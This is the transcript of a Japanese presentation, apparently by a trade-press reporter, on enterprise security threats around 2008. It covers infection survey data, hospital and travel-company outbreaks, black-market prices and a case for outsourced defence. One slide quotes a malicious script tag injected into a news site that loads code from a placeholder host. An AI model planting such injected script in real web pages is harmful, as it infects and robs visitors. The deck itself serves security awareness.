Comments
Description
Transcript
セキュリティ管理の新潮流
セキュリティ管理の 新潮流 記者 中道 理 今日のアジェンダ • • • • • 企業が直面している問題~9/15号プレビュ~ 攻撃者の狙いとは 見えない化する攻撃手口 役に立たない?従来型の防御法 これからの守り方考 企業が直面している問題 問1 過去2年間,ウイルスに感染したことが あるか? 0% 2% ある ない 把握していない 無回答 36% 62% サンプル数:708社 日経コミュニケーション&総務省調べ 企業が直面している問題 問2 どうやって感染した? 20% 27% 4% USBメモリーを介して感染した 不正コード埋め込みサイトにアクセス 7% メールに添付されたウイルスを開いた 社外に持ち出したパソコンが感染した その他 わからない 18% 24% サンプル数:255社 日経コミュニケーション&総務省調べ 企業が直面している問題 問3 ウイルスに感染した結果起こった現象は? 6% 2% 36% 24% 感染PC/サーバーが使えない状態に LAN性能が極端に劣化または止まった 感染PCに保管していたデータが消えた 周囲のPC保管していたデータが消えた 0% 1% 4% サーバーに保管していたデータが消えた その他 わからない 27% 無回答 サンプル数:255社 日経コミュニケーション&総務省調べ 企業が直面している問題 千葉大学医学部の例(2007年9月) • • • • 看護師が資料作成のために「人体図」 のサイトを閲覧し,感染 大学病院内の1200台に感染が拡大 電子カルテなどのシステムが利用不可 能に ウイルス対策ソフトの導入,パターン ファイルのアップデートはやっていた 「紙のカルテでやり取り。現場は混乱」「患者さんにレントゲンの撮影 を後日お願い」 企業が直面している問題 千葉大学医学部 2007/9/5 4:22 2007/9/5 4:22 2007/9/5 4:23 2007/9/5 4:23 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:38 2007/9/5 4:39 2007/9/5 4:39 2007/9/5 4:39 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、ファイルを駆除または隔離できま セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、ファイルを駆除または隔離できま セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 セキュリティ上の危険が検出されましたが、駆除できません。ファイルは隔離 企業が直面している問題 JTBの例(2006年12月) ・社員が中国の展示会の情報を閲覧したのが原因 ・パソコンの動作が遅くなったことで気付く(Officeファイ ルの保存が異常に遅い) ・IEのトップページが中国語サイトに,OSが再起動を繰 り返す ・最終的には800台に感染 ・120人が復旧作業に従事 ・復旧までに5日以上必要に(200台が復旧不能に) ・100件以上の検体をトレンドマイクロに提出 企業が直面している問題 JTBの例(2006年12月)続き • 【感染したウイルス例】 • PE_FUJACKS>Webサイトから他のウイルスをダウ ンロード&ネットワーク感染 • PE_LOOKED>ネットワークを介して感染,情報漏洩 を発生させる不正プログラムをダウンロード • TSPY_LEGMIR>オンライン・ゲームのアカウント名と パスワードを収集して情報を犯罪者に送信 • TSPY_QQROB>パスワード情報を収集して,犯罪者 に送信 担当者は「見付かっただけまし」,「今でも動いている可能性がある」と語る 攻撃者の狙いとは 攻撃の踏み台&情報の盗難 フィッシング・メー ル,迷惑メール, 狙い撃ちメール ウイルスを仕込んだマシン メールの送信 犯罪者 指令 DoS攻撃 踏み台 情報の盗難 クレジットカード,社会保障番号, 企業の機密情報,メール・アド レス・リストなど いやがらせ, 脅迫 フィッシング 用サイトの ハッキング など 攻撃者の狙いとは 動機はすべて「お金」 ぜい弱性情報 販売マーケット 購入 悪性プログラム 販売マーケット クレジットカード番号 販売マーケット 購入 犯罪者 販売 迷惑メール送信マーケット メール・リスト 販売マーケット 販売 受注 各種攻撃指令 販売 企業機密 販売マーケット 情報収集 犯罪者の支配下のパソコン 犯罪者の狙いとは 販売例(価格) • • • 【ウイルス・ジェネレータ】 普通のもの 数十~数千元(数百円~数万円) ゼロデイもの 数万元(数十万円) • • 【攻撃用Webサイト】 1万アクセスに対して40~60元(600円~900円程度) • • • 【クレジットカード番号】 米国人のアカウント 1個3ドル(330円) ドイツ人のアカウント 1個7ドル(770円) • • 【DDoS】 100ドルで1日サービスを止める(10分間の無償お試しサービス付き) 見えない化する攻撃手口 犯罪サーバーA • 大量感染 犯罪サーバーB 犯罪サーバーC 犯罪サーバーD いろんな場所から大 量にインストール 犯罪サーバーE 「JTBでは1度に30~40個」「千葉大医学部では30ぐらい」 さらに! 見えない化する攻撃手口 犯罪者の支配下にあるサーバー 時間の経 過方向 A A’ A’’ A’’’ 感染 A用 A’用 対策パターン・ファ イルの配信 =不正プログラム ウイルス対策ソフト・ベ ンダー =パターン・ファイル 「JTBのケースでは一度に30個ダウンロード 30×n=???」 見えない化する攻撃手口 つまり,一度ウイルスが入り込 んだら,どんどん新しいものが 送り込まれてくるため,発見は 困難。 「自分の手には負えなくなったので,あるウイルス対策ソ フトベンダーに聞いたら,もはや見つける方法はありませ ん。再インストールするしかありませんといわれてしまっ た」(あるセキュリティ・コンサルタント) 見えない化する攻撃手口 今,トレンドの感染方法は大きく三つ • Webページ • USBメモリー → 原因は不明 • メール 見えない化する攻撃手口 • Webページ>狙われるアドオン・アプリケーション QuickTime (iTunes Store) 連携 Flash (YouTube) Adobe Reader (PDFファイル) Real Player ここが狙われる! 見えない化する攻撃手口 • Business Weekのページの例 <script src=http://xxxx.com/O.ja></script> 見えない化する攻撃手口 メール攻撃:標的型攻撃が主流に 【特徴1】知人や上 司からのメールを 装う 米国陸軍士 官学校でも8 割が開いた 【特徴2】ゼロデイ の攻撃でウイルス を仕掛けてくる(最 近はWebに誘導) これ以外にも,「北島が“金”剥奪」,「福田首相,危篤状態」など興味を 持ちそうなネタで添付ファイルやWebページに誘い込む(注:もちろんど ちらも嘘です) 見えない化する攻撃の手口 メール攻撃 犯罪者の管理下にあるサーバー 企業の端末 犯罪者 インターネット メール ③バックドア・プ ログラムを自動 ダウンロード 機密情報の入手や 踏み台に使う 添付ファイル 重要なお知らせ .doc ①添付ファイルを 開く ダウン ローダ ②ダウン ローダが 起動 犯罪者の 支配下に ④バックドア・プログラムを 自動実行 20 08 20 /3/9 08 /3 20 /14 08 /3 20 /19 08 /3 20 /24 08 /3 / 20 29 08 /4 20 /3 08 20 /4/8 08 /4 20 /13 08 /4 20 /18 08 /4 20 /23 08 /4 / 20 28 08 /5 20 /3 08 20 /5/8 08 /5 20 /13 08 /5 20 /18 08 /5 20 /23 08 /5 / 20 28 08 /6 20 /2 08 20 /6/7 08 /6 20 /12 08 /6 20 /17 08 /6 20 /22 08 /6 / 20 27 08 /7 20 /2 08 /7 /7 見えない化する攻撃手口 SQLインジェクションの被害が相次いでいる >Webページの改ざんに加えて,クレジットカード情報などを抜かれる 1800 1600 800 6月18日 1400 1200 1000 情報盗難 Web改ざん 600 400 200 0 日本アイ・ビー・エム株式会社 ISS事業部調べ 見えない化する攻撃手口 • SQLインジェクション 役に立たない?従来型の防御方法 クライアントでは従来・・・ • パッチの適用 • ウイルス対策ソフトの導入とパター ン・ファイルのアップデート 役に立たない?従来型の防御方法 • パッチの適用>ゼロデイの一般化で 無力に パッチを公開 ウイルスが出回る この間にパッチを適用すれば 攻撃を受けない パッチがないので攻撃を止めれない!! ウイルスが出回る パッチを公開 役に立たない?従来型の防御方法 • パッチの適用 ぜい弱性ID ぜい弱性の公表日 パッチ公開日 攻撃コード公 開 ブラック・マーケッ トで販売 中国Webサイトでの 利用 MS07-004 1月9日 1月9日 1月16日 1月22日 1月26日 MS07-009 2006年10月24日 2月13日 3月26日 ― 3月28日 MS07-017 3月28日 4月3日 4月8日 4月10日 3月30日 MS07-020 4月10日 4月10日 ― 7月24日 9月15日 MS07-027 5月8日 5月8日 5月10日 4月10日 3月30日 MS07-033 3月14日 6月12日 3月14日 6月13日 7月7日 MS07-035 6月12日 6月12日 ― 7月8日 7月11日 MS07-045 8月15日 8月14日 ― 9月2日 9月2日 CVE-2007-3148 6月6日 ― 6月6日 ― 6月8日 CVE-2007-4105 8月2日 8月2日 10月3日 9月23日 8月18日 CVE-2007-4748 8月19日 ― 8月31日 9月8日 8月19日 CVE-2007-4816 9月7日 9月20日 ― 9月8日 9月6日 CVE-2007-5017 9月19日 ― 9月19日 ― 9月26日 CVE-2007-3296 5月30日 6月1日 ― 6月28日 6月25日 CVE-2007-5064 8月30日 ― 9月19日 9月14日 8月30日 役に立たない?従来型の防御方法 • ウイルス対策ソフト>ウイルスの膨大化で 対処不能に 米シマンテック社調べ 「シマンテック グローバルインターネットセキュリティ脅威レポート Volume XIII」より抜粋 役に立たない?従来型の防御法 • サーバー側 >SQLインジェクションなどサーバーの問 題はほとんど対処可能,ただし,ぜい 弱性検査などにお金がかかるため, 対策が進まないのが現状。 これからの守り方考 ネット犯罪の現状 犯罪者 情報交換 情報交換 マーケット マーケット 企業 情報量 物々交換,金銭の授受で 物々交換,金銭の授受で ・組織内でも情報は分散 ・ディープな情報は交換されない これからの守り方考 理想の状態 犯罪者 情報交換 情報交換 マーケット マーケット 物々交換,金銭の授受で 物々交換,金銭の授受で 企業 情報量 緊密な情報交換 緊密な情報交換 これからの守り方考 システム担当者が情報を集めるのは限界。 情報を持っているところに守ってもらう モデルに移行>徹底的にアウトソーシング 連携 ISP/通信事業者 企業 企業 企業 セキュリティ・ベンダー 企業 企業 企業 業界団体 企業 企業 企業 これからの守り方考 アウトソースに向けた技術基盤が拡充 【クライアント】 • シンクライアント • vProテクノロジー ##管理者権限の取り上げが重要 「システムを集中化すれば,リ スクの8割を減らすことができ る」―SANSインスティチュート 【サーバー】 • SaaS • クラウド・コンピューティング • 仮想化 これからの守り方考 vProについて これからの守り方考 ルーター/セキュリティ・ アプライアンスの保守 パッチ当て ISP/MSP/通信事業者 サーバーの保守 SaaS/クラウド事業者 ウイルス対策ソ フトの保守 WAN/インターネット/NGN網 WAN/インターネット/NGN網 画面情報だけを利用 企業ユーザー ご清聴ありがとうございました